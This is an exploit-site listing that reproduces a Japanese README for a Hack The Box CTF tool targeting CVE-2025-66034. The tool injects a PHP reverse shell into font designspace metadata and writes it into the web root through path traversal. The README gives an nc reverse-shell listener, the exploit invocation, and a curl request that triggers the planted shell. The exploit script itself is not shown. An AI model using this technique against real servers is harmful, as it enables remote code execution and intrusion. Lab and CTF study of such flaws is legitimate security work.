Sploitus

Exploit for CVE-2025-66034-htb-ctf

kitploit · 2026-09-01

Exploit Code

MARKDOWN74 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JWSLY12-CVE-2025-66034-HTB-CTF
# CVE-2025-66034-htb-ctf

# VariaType 可変フォント生成エクスプロイト

このリポジトリには、Hack The Box の **VariaType** マシン向けの特化型エクスプロイトが含まれています。このエクスプロイトは、`fontTools` ライブラリまたは Web アプリケーションが `.designspace` XML ファイルとメタデータの補間を処理する方法における脆弱性を悪用して、**リモートコード実行 (RCE)** を達成します。

## 📝 説明

脆弱性はフォント生成プロセスに存在します。悪意のある `designspace` ファイルを細工することで、PHP リバースシェルのペイロードをフォントのメタデータ(具体的には `<labelname>` フィールド)に注入できます。サーバーがこれらのファイルを処理して可変フォントを生成すると、出力がユーザー定義のパスに書き込まれるため、Web ルートに `.php` シェルを配置できます。

## 🛠️ 特徴

  * **自動フォント生成** : `fontTools` を使用して、有効な `source-light.ttf` および `source-regular.ttf` マスターフォントを作成します。
  * **XML インジェクション** : CDATA でラップされた PHP ペイロードを含む悪意のある `designspace` ファイルを生成します。
  * **パストラバーサル / 任意ファイル書き込み** : 生成された「フォント」を `.php` ファイルとして公開ディレクトリに保存しようとします。
  * **ランダム化** : 競合を避けるために一意のシェル名を生成します。



## 🚀 要件

Python 3 と以下のライブラリがインストールされている必要があります:

root@kitploit:~
    
    
    pip install fontTools requests
    

## 💻 使用方法

### 1\. リスナーを起動する

ローカルマシン(または Pwnbox)で Netcat リスナーを起動します:

root@kitploit:~
    
    
    nc -lvnp 4444
    

### 2\. エクスプロイトを実行する

HTB VPN IP とリスナーポートを指定してスクリプトを実行します:

root@kitploit:~
    
    
    python3 exploit.py --ip <YOUR_IP> --port 4444
    

### 3\. シェルを起動する

アップロードが `200 OK` を返した場合(エラー前に処理が行われると `500` を返すこともあります)、スクリプトがファイル名を表示します。`curl` またはブラウザでアクセスしてください:

root@kitploit:~
    
    
    curl http://portal.variatype.htb/shell_xxxxxx.php
    

## ⚙️ 引数

## ⚠️ 免責事項

このスクリプトは、教育目的および許可されたペネトレーションテスト専用です。事前の許可なしにターゲットへアクセスまたは攻撃することは違法です。

* * *

### この README の使用方法:

  1. 上記の内容を `README.md` としてスクリプトと同じフォルダに保存します。
  2. スクリプトの名前が `exploit.py` であることを確認するか、上記のコマンド内のファイル名を更新します。